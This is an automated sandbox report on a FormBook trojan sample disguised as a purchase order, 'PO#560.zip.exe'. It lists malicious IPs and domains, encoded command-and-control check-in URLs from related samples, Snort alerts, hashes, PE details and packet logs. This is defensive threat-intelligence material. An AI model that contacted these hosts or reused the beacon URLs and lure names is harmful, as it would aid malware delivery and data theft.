                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.zhongyicts.com.cnalvPO#560.zip.exe, 00000000.00000003.213564531.00000000060B0000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            151.101.1.211
                                            dualstack.sni.bigcartel.map.fastly.netUnited States
                                            54113FASTLYUStrue
                                            50.118.194.26
                                            www.talllensphotography.comUnited States
                                            18779EGIHOSTINGUStrue
                                            185.53.177.14
                                            www.new123movies.proGermany
                                            61969TEAMINTERNET-ASDEtrue

                                            General Information

                                            Joe Sandbox Version:31.0.0 Emerald
                                            Analysis ID:383967
                                            Start date:08.04.2021
                                            Start time:13:20:10
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 10m 46s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:PO#560.zip.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:30
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/1@4/3
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 20.6% (good quality ratio 17.9%)
                                            • Quality average: 68.8%
                                            • Quality standard deviation: 34.2%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 104.43.193.48, 40.88.32.150, 23.54.113.53, 52.255.188.83, 52.147.198.201, 168.61.161.212, 95.100.54.203, 20.82.210.154, 23.0.174.185, 23.0.174.200, 23.10.249.26, 23.10.249.43, 20.54.26.129, 104.83.127.80, 104.83.87.75
                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, cdn.onenote.net.edgekey.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wildcard.weather.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, tile-service.weather.microsoft.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            13:21:11API Interceptor2x Sleep call for process: PO#560.zip.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            151.101.1.211PO#41000055885.exeGet hashmaliciousBrowse
                                            • www.themelaninkloset.com/s2oc/?8pDp00Hp=4et4FaxN7qEBNT6CH0ez/E8Dsb/i+ag7YHyBfouUYdL2gsctUxkX/3SGPji7Vpx94OAO&GzrL=WBjT_rUpa
                                            1drive.exeGet hashmaliciousBrowse
                                            • www.sunsetcherrydesigns.com/bf3/?ofrxUr=z+RdWRCQVf1bdnGc2R5YR6rM/6sPZTZSg7KrVxVPdery5GTrkAKGAiYLRPGVSBCJDCuD&vL3=DX1ltFKxhhDH0NG
                                            PO-108561.exeGet hashmaliciousBrowse
                                            • www.themelaninkloset.com/s2oc/?6l=UlSp&GTgP=4et4FaxN7qEBNT6CH0ez/E8Dsb/i+ag7YHyBfouUYdL2gsctUxkX/3SGPji7Vpx94OAO
                                            CIF Warsaw, PL.docGet hashmaliciousBrowse
                                            • www.lohushirts.com/ggm/?2d2lbDM=FmVsm8yJy3o4N73UV6a3eDIgWNbuuxXqXgkL1a345HT6WSTKiLzmujkKUJY5KDL/BcumXA==&3fz=fxopBn3xVHz0wjip
                                            ORDER 0321.xlsxGet hashmaliciousBrowse
                                            • www.kazaniansemporium.com/mdi/?qJE0=G0GpifmhvntLyLO&-ZoXL=Ukkr0xduwJyqlRkW6DLQgok1J3em4aUvaYfD3PuPAT4El0i7xKTf9yliHfHdRikdYVI2Wg==
                                            aQnaI0DXH8l8WfB.exeGet hashmaliciousBrowse
                                            • www.animegriptape.com/uszn/?hBZ=bvW195OsOyiVGNxdZYx0gND0s+5aO8LIQRJvcr0ieH3bam7oATXiZfLwJhm+6mFGC/VP&Wr=LhnLHrv82
                                            Parcel _009887 .exeGet hashmaliciousBrowse
                                            • www.annsdyeshop.com/csw6/?t8bHuZw=Rhb01RneKuHXTPiWjgeUl6S/cUFgmxqkxBOjaeKaGNWDobLhoR5VZAcx9/za/wSI2hT6QRiLPg==&2d=llsp
                                            NWvnpLrdx4.exeGet hashmaliciousBrowse
                                            • www.theindiaallureshop.com/da0a/?0pn=jOU7cI5/+szqhWIjpIydt61kBzYwAKSDHR3RGTYHvzw9khcqjN3kz0fS8ehjw9D2F6h6B+QEdg==&D6Ap=ZfoTzbtx3ht
                                            Xi4vVgHekF.exeGet hashmaliciousBrowse
                                            • www.pinkcouturecollection.com/rina/?GFQL=hH+8hb51AwOfjaxJPL0yauFlUal0NiIgwc48TRuYBxnYS7MgRz93KNxBEzoiKPfIGdpR&wFN0DX=UtX8E
                                            Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                            • www.strawberryhearts.com/h3qo/?zL0lV0=HfJSiNDRC9T1mqopA9EExv7r8pXWCasA0nOTgrYBcQfcawbhGFXSgDSLDZJueGLLScsV&Wzr=H0DXHrHhI0T8J
                                            9tyZf93qRdNHfVw.exeGet hashmaliciousBrowse
                                            • www.animegriptape.com/uszn/?OtQl7=bvW195OsOyiVGNxdZYx0gND0s+5aO8LIQRJvcr0ieH3bam7oATXiZfLwJhmUlW1GG9dP&TT=FhLpvxO
                                            Shipping Documents PL&BL Draft.exeGet hashmaliciousBrowse
                                            • www.strawberryhearts.com/h3qo/?mvHpc=HfJSiNDRC9T1mqopA9EExv7r8pXWCasA0nOTgrYBcQfcawbhGFXSgDSLDap+RnbzM5FS&sPj8=mh84WN0PyZRt
                                            DHL-Shipment-Documents.scr.exeGet hashmaliciousBrowse
                                            • www.lashdreamblvd.com/vnc/?7n38Ura=VL+/i4NcL0iBAexwvYWtmYUgLMAplunlrIdV1ZetG71U4kzfLgJwOR7hriu2EZlGb/Vo&yXoTn8=yZBxIB
                                            NEW URGENT ORDER FROM PUK ITALIA GROUP SRL.EXEGet hashmaliciousBrowse
                                            • www.uniquehairllc.com/k47/?r6=GbwDj4ypT&-ZU=zaEiAUWzhGf00blgYVrxIVSvtD9y5l2u4FGFIU/gdJgDDlZuDG+K6r7n7uEQR8jyp8ma
                                            50.118.194.26PO#7689.zip.exeGet hashmaliciousBrowse
                                            • www.talllensphotography.com/md5/?Jzu4_4C=JP702FCblU1K1nbBBTKIcgs3vFjx7LTnku6fbfQ3JvhMEqeKMVIpxerk2LYKo8e/vDsV&NrThfj=D48x
                                            185.53.177.14inquiry 19117030P.xlsxGet hashmaliciousBrowse
                                            • www.zunebox.com/pp2/?khX0G=YCG/V5x90Bs8NSXDDDtBJoG4GCoNsYz+F8ezmK1WpQlgtBp/NM+4LhqYC9/Kv1A4xuDj/Q==&VfRhwF=EDKtZh5H9V3tBNR
                                            6z0GZwvVSRNDV96.exeGet hashmaliciousBrowse
                                            • www.tw2dl.com/cpi/?rP0DzZ=1qR/tzchkuTVe7V2erKDG2yNod6xB/0wxqlswUmIPiLW+bT+pfkW7EoZ2Q12By7DbBmv&Lh0h=ZTytW2D0v
                                            WinRAR4.01.exeGet hashmaliciousBrowse
                                            • mahi.fileave.com/mvsmvm.exe

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            www.talllensphotography.comPO#7689.zip.exeGet hashmaliciousBrowse
                                            • 50.118.194.26
                                            dualstack.sni.bigcartel.map.fastly.netPO#41000055885.exeGet hashmaliciousBrowse
                                            • 151.101.1.211
                                            1drive.exeGet hashmaliciousBrowse
                                            • 151.101.1.211
                                            PO-108561.exeGet hashmaliciousBrowse
                                            • 151.101.1.211
                                            CIF Warsaw, PL.docGet hashmaliciousBrowse
                                            • 151.101.1.211
                                            ORDER 0321.xlsxGet hashmaliciousBrowse
                                            • 151.101.1.211
                                            aQnaI0DXH8l8WfB.exeGet hashmaliciousBrowse
                                            • 151.101.1.211
                                            PO#652.exeGet hashmaliciousBrowse
                                            • 151.101.1.211
                                            Parcel _009887 .exeGet hashmaliciousBrowse
                                            • 151.101.1.211
                                            NWvnpLrdx4.exeGet hashmaliciousBrowse
                                            • 151.101.1.211
                                            Xi4vVgHekF.exeGet hashmaliciousBrowse
                                            • 151.101.1.211
                                            Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                            • 151.101.1.211
                                            9tyZf93qRdNHfVw.exeGet hashmaliciousBrowse
                                            • 151.101.1.211
                                            Shipping Documents PL&BL Draft.exeGet hashmaliciousBrowse
                                            • 151.101.1.211
                                            DHL-Shipment-Documents.scr.exeGet hashmaliciousBrowse
                                            • 151.101.1.211
                                            NEW URGENT ORDER FROM PUK ITALIA GROUP SRL.EXEGet hashmaliciousBrowse
                                            • 151.101.1.211

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            TEAMINTERNET-ASDEsafecrypt.exeGet hashmaliciousBrowse
                                            • 185.53.178.54
                                            RFQ HAN4323.exeGet hashmaliciousBrowse
                                            • 185.53.177.11
                                            Doc.exeGet hashmaliciousBrowse
                                            • 185.53.178.14
                                            payment slip_pdf.exeGet hashmaliciousBrowse
                                            • 185.53.177.10
                                            iQnbU4o7yx.exeGet hashmaliciousBrowse
                                            • 185.53.179.28
                                            requisition from ASTRO EXPRESS.xlsxGet hashmaliciousBrowse
                                            • 185.53.177.10
                                            inquiry 19117030P.xlsxGet hashmaliciousBrowse
                                            • 185.53.177.14
                                            HwL7D1UcZG.exeGet hashmaliciousBrowse
                                            • 185.53.177.13
                                            CREDIT NOTE DEBIT NOTE 30.1.2021.xlsxGet hashmaliciousBrowse
                                            • 185.53.177.13
                                            CiL08gVVjl.exeGet hashmaliciousBrowse
                                            • 185.53.177.13
                                            Mv Maersk Kleven V949E.xlsxGet hashmaliciousBrowse
                                            • 185.53.177.13
                                            Inquiry PR11020204168.xlsxGet hashmaliciousBrowse
                                            • 185.53.177.13
                                            PO210119.exe.exeGet hashmaliciousBrowse
                                            • 185.53.178.53
                                            payment advice002436_pdf.exeGet hashmaliciousBrowse
                                            • 185.53.177.10
                                            PDRgIfT71e.exeGet hashmaliciousBrowse
                                            • 185.53.177.13
                                            Payment Advice.xlsxGet hashmaliciousBrowse
                                            • 185.53.177.13
                                            payment advice00000789_pdf.exeGet hashmaliciousBrowse
                                            • 185.53.177.10
                                            Q52msELKeI.exeGet hashmaliciousBrowse
                                            • 185.53.178.13
                                            IMG-CMR.xlsxGet hashmaliciousBrowse
                                            • 185.53.178.10
                                            20210111140930669.exeGet hashmaliciousBrowse
                                            • 185.53.178.13
                                            FASTLYUSTelekom.jarGet hashmaliciousBrowse
                                            • 185.199.109.154
                                            Telekom.jarGet hashmaliciousBrowse
                                            • 185.199.111.154
                                            Telekom.jarGet hashmaliciousBrowse
                                            • 185.199.108.154
                                            Telekom.jarGet hashmaliciousBrowse
                                            • 185.199.110.154
                                            nicoleta.fagaras-DHL_TRACKING_1394942.htmlGet hashmaliciousBrowse
                                            • 151.101.12.193
                                            PO#41000055885.exeGet hashmaliciousBrowse
                                            • 151.101.1.211
                                            DHL Paket.jarGet hashmaliciousBrowse
                                            • 185.199.108.154
                                            DHL Paket.jarGet hashmaliciousBrowse
                                            • 185.199.108.154
                                            agmz0F8LbA.dllGet hashmaliciousBrowse
                                            • 151.101.114.132
                                            vniSIKfm4h.dllGet hashmaliciousBrowse
                                            • 151.101.114.132
                                            61mwzdX4GC.dllGet hashmaliciousBrowse
                                            • 151.101.14.132
                                            WbQrxxnmAO.dllGet hashmaliciousBrowse
                                            • 151.101.14.132
                                            aunobp.dllGet hashmaliciousBrowse
                                            • 151.101.1.44
                                            J18DGDMA9dGet hashmaliciousBrowse
                                            • 151.101.112.193
                                            46578-TR.exeGet hashmaliciousBrowse
                                            • 151.101.1.195
                                            syscshost.dllGet hashmaliciousBrowse
                                            • 151.101.14.132
                                            syscshost.dllGet hashmaliciousBrowse
                                            • 151.101.1.44
                                            GvqwXsjgUm.apkGet hashmaliciousBrowse
                                            • 199.232.192.233
                                            GvqwXsjgUm.apkGet hashmaliciousBrowse
                                            • 199.232.192.233
                                            BL836477488575.exeGet hashmaliciousBrowse
                                            • 185.199.108.153
                                            EGIHOSTINGUSPO4308.exeGet hashmaliciousBrowse
                                            • 104.164.33.210
                                            PO7321.exeGet hashmaliciousBrowse
                                            • 104.164.33.210
                                            SAKKAB QUOTATION_REQUEST.exeGet hashmaliciousBrowse
                                            • 107.164.194.71
                                            RFQ-V-SAM-0321D056-DOC.exeGet hashmaliciousBrowse
                                            • 104.252.75.179
                                            RFQ-415532-Refractory Materials for KNPC PROJECT_Tender in Kuwait...xlsx.exeGet hashmaliciousBrowse
                                            • 107.165.116.66
                                            Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                            • 107.186.223.220
                                            PO PL.exeGet hashmaliciousBrowse
                                            • 107.186.125.46
                                            PO#7689.zip.exeGet hashmaliciousBrowse
                                            • 50.118.194.26
                                            2021-04-01.exeGet hashmaliciousBrowse
                                            • 107.186.80.12
                                            PI.exeGet hashmaliciousBrowse
                                            • 104.252.75.130
                                            Inquiry.docxGet hashmaliciousBrowse
                                            • 50.118.194.27
                                            BL Draft copy.exeGet hashmaliciousBrowse
                                            • 107.186.80.9
                                            g0g865fQ2S.exeGet hashmaliciousBrowse
                                            • 142.111.47.2
                                            FTT103634332.exeGet hashmaliciousBrowse
                                            • 50.117.53.247
                                            PaymentInvoice.exeGet hashmaliciousBrowse
                                            • 107.186.80.174
                                            534ucFq00y.exeGet hashmaliciousBrowse
                                            • 104.252.75.62
                                            Order Drawing.exeGet hashmaliciousBrowse
                                            • 23.27.34.179
                                            New Order-756678 SEG.exeGet hashmaliciousBrowse
                                            • 107.165.125.43
                                            50729032021.xlsxGet hashmaliciousBrowse
                                            • 205.164.14.67
                                            1LHKlbcoW3.exeGet hashmaliciousBrowse
                                            • 205.164.14.67

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO#560.zip.exe.log
                                            Process:C:\Users\user\Desktop\PO#560.zip.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.355304211458859
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                            MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                            SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                            SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                            SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.7305421671176875
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:PO#560.zip.exe
                                            File size:935424
                                            MD5:225f5938273f006356fd813e46e3fcef
                                            SHA1:347cd34fd095ae8f843ee436dde5043bba8fb192
                                            SHA256:69a395d24a3536ef7698ae036596bed55856d4777356946f498faec3f1395f8d
                                            SHA512:a6b9d13ea56e7e22abb484de6c4d5b53b7dc645e23327c9b45d20ce872408d3a9c9c93bdf540e39dd3c4a0206f7fc5008edff5787fad1b2674ebe3e060bbfb9c
                                            SSDEEP:12288:cZAyLGu2iN5p+QYy+SOndeb/xw2enStrpLZREcsYBrKLyrrkqe0ZfH/V14SiyyjK:OKu115ZYMb/xjeStrBsfyMHW/Ed8
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...uKn`..............0..P...........o... ........@.. ....................................@................................

                                            File Icon

                                            Icon Hash:929296929e9e8eb2

                                            Static PE Info

                                            General

                                            Entrypoint:0x4b6fe2
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x606E4B75 [Thu Apr 8 00:16:53 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            mov dword ptr [eax+4Eh], edx
                                            inc edi
                                            or eax, 000A1A0Ah
                                            add byte ptr [eax], al
                                            add byte ptr [ecx+45h], cl
                                            dec esi
                                            inc esp
                                            scasb
                                            inc edx
                                            pushad
                                            add byte ptr [eax], 00000000h
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb6f900x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x2f0ac.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xe80000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xb50000xb5000False0.906085441126data7.89802258187IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc0xb80000x2f0ac0x2f200False0.362426434019data6.24227262152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xe80000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_ICON0xb82b00x709ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                            RT_ICON0xbf3500x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 318767104, next used block 117440512
                                            RT_ICON0xcfb780x94a8data
                                            RT_ICON0xd90200x5488data
                                            RT_ICON0xde4a80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 224, next used block 117440512
                                            RT_ICON0xe26d00x25a8data
                                            RT_ICON0xe4c780x10a8data
                                            RT_ICON0xe5d200x988data
                                            RT_ICON0xe66a80x468GLS_BINARY_LSB_FIRST
                                            RT_GROUP_ICON0xe6b100x84data
                                            RT_VERSION0xe6b940x32cdata
                                            RT_MANIFEST0xe6ec00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Version Infos

                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            LegalCopyrightCopyright 2018 - 2021
                                            Assembly Version3.1.0.5
                                            InternalNameW.exe
                                            FileVersion3.1.0.5
                                            CompanyName
                                            LegalTrademarks
                                            Comments
                                            ProductNameImage Manager
                                            ProductVersion3.1.0.5
                                            FileDescriptionImage Manager
                                            OriginalFilenameW.exe

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            04/08/21-13:22:36.529475TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.3185.53.177.14
                                            04/08/21-13:22:36.529475TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.3185.53.177.14
                                            04/08/21-13:22:36.529475TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.3185.53.177.14
                                            04/08/21-13:22:36.553844TCP1201ATTACK-RESPONSES 403 Forbidden8049734185.53.177.14192.168.2.3
                                            04/08/21-13:22:57.201417TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.350.118.194.26
                                            04/08/21-13:22:57.201417TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.350.118.194.26
                                            04/08/21-13:22:57.201417TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.350.118.194.26

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 8, 2021 13:22:15.841835022 CEST4973280192.168.2.3151.101.1.211
                                            Apr 8, 2021 13:22:15.857836008 CEST8049732151.101.1.211192.168.2.3
                                            Apr 8, 2021 13:22:15.858004093 CEST4973280192.168.2.3151.101.1.211
                                            Apr 8, 2021 13:22:15.858206034 CEST4973280192.168.2.3151.101.1.211
                                            Apr 8, 2021 13:22:15.874119997 CEST8049732151.101.1.211192.168.2.3
                                            Apr 8, 2021 13:22:16.213646889 CEST8049732151.101.1.211192.168.2.3
                                            Apr 8, 2021 13:22:16.213701963 CEST8049732151.101.1.211192.168.2.3
                                            Apr 8, 2021 13:22:16.213835955 CEST4973280192.168.2.3151.101.1.211
                                            Apr 8, 2021 13:22:16.213891983 CEST4973280192.168.2.3151.101.1.211
                                            Apr 8, 2021 13:22:16.229676962 CEST8049732151.101.1.211192.168.2.3
                                            Apr 8, 2021 13:22:36.477161884 CEST4973480192.168.2.3185.53.177.14
                                            Apr 8, 2021 13:22:36.502964973 CEST8049734185.53.177.14192.168.2.3
                                            Apr 8, 2021 13:22:36.503087044 CEST4973480192.168.2.3185.53.177.14
                                            Apr 8, 2021 13:22:36.529350996 CEST8049734185.53.177.14192.168.2.3
                                            Apr 8, 2021 13:22:36.529474974 CEST4973480192.168.2.3185.53.177.14
                                            Apr 8, 2021 13:22:36.553801060 CEST8049734185.53.177.14192.168.2.3
                                            Apr 8, 2021 13:22:36.553843975 CEST8049734185.53.177.14192.168.2.3
                                            Apr 8, 2021 13:22:36.553864002 CEST8049734185.53.177.14192.168.2.3
                                            Apr 8, 2021 13:22:36.554056883 CEST4973480192.168.2.3185.53.177.14
                                            Apr 8, 2021 13:22:36.554112911 CEST4973480192.168.2.3185.53.177.14
                                            Apr 8, 2021 13:22:36.578423023 CEST8049734185.53.177.14192.168.2.3
                                            Apr 8, 2021 13:22:57.036416054 CEST4973780192.168.2.350.118.194.26
                                            Apr 8, 2021 13:22:57.201137066 CEST804973750.118.194.26192.168.2.3
                                            Apr 8, 2021 13:22:57.201230049 CEST4973780192.168.2.350.118.194.26
                                            Apr 8, 2021 13:22:57.201416969 CEST4973780192.168.2.350.118.194.26
                                            Apr 8, 2021 13:22:57.413631916 CEST804973750.118.194.26192.168.2.3
                                            Apr 8, 2021 13:22:57.824215889 CEST4973780192.168.2.350.118.194.26
                                            Apr 8, 2021 13:22:58.049128056 CEST804973750.118.194.26192.168.2.3

                                            UDP Packets

